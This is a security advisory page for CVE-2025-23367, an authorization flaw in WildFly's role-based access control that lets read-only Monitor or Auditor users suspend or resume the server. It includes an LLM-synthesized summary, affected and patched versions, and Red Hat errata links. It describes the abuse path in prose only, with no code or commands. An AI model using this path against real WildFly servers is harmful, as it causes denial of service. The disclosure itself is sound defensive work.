VYPR
← All advisories
Moderate severityOSV Advisory· Published Jan 30, 2025· Updated Apr 30, 2026

Org.wildfly.core:wildfly-server: wildfly improper rbac permission

CVE-2025-23367

Description

A flaw was found in the Wildfly Server Role Based Access Control (RBAC) provider. When authorization to control management operations is secured using the Role Based Access Control provider, a user without the required privileges can suspend or resume the server. A user with a Monitor or Auditor role is supposed to have only read access permissions and should not be able to suspend the server. The vulnerability is caused by the Suspend and Resume handlers not performing authorization checks to validate whether the current user has the required permissions to proceed with the action.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

CVE-2025-23367: In WildFly, the RBAC provider fails to enforce authorization for Suspend/Resume handlers, letting users with Monitor/Auditor roles suspend the server.

Vulnerability

Description A flaw in WildFly’s Role Based Access Control (RBAC) provider allows users assigned the Monitor or Auditor roles—which are intended to grant only read-only access—to suspend or resume the management server. The root cause is that the Suspend and Resume management operation handlers do not perform authorization checks to verify the current user has the required permissions before executing the action [1].

Exploitation

To exploit this vulnerability, an attacker must first have valid credentials for a WildFly user account that has been granted the Monitor or Auditor role. The attacker can then send a management operation request to suspend or resume the server, which the handler will process without verifying that the user has the necessary write-level authorization. No additional privileges or network position beyond access to the management interface are required [2].

Impact

A successful attack can lead to a denial-of-service condition, as an unauthorized user can suspend the WildFly server, making it unavailable to serve applications. Conversely, a user could resume a suspended server, possibly interfering with intended administrative controls. The confidentiality and integrity of the server are not directly compromised [3][4].

Mitigation

Red Hat has released security updates (RHSA-2025:3465, RHSA-2025:3989, RHSA-2025:3990, and RHSA-2025:4550) for various affected products, including Red Hat Enterprise Linux and Red Hat Single Sign-On. Administrators should apply the updates to ensure proper authorization checks are performed on the Suspend and Resume handlers. There are no known workarounds; upgrading to the fixed versions is the recommended course of action [1][2][3][4].

References
  1. https://access.redhat.com/errata/RHSA-2025:3465
  2. https://access.redhat.com/errata/RHSA-2025:3989
  3. https://access.redhat.com/errata/RHSA-2025:3990
  4. https://access.redhat.com/errata/RHSA-2025:4550

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
org.wildfly.core:wildfly-serverMaven
< 27.0.1.Final27.0.1.Final
org.wildfly.core:wildfly-serverMaven
>= 28.0.0.Beta1, < 28.0.0.Beta228.0.0.Beta2

Affected products

1
  • Wildfly/WildflyOSV
    Range: 10.0.0.Alpha1, 10.0.0.Alpha2, 10.0.0.Alpha3, …

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

14

News mentions

0

No linked articles in our index yet.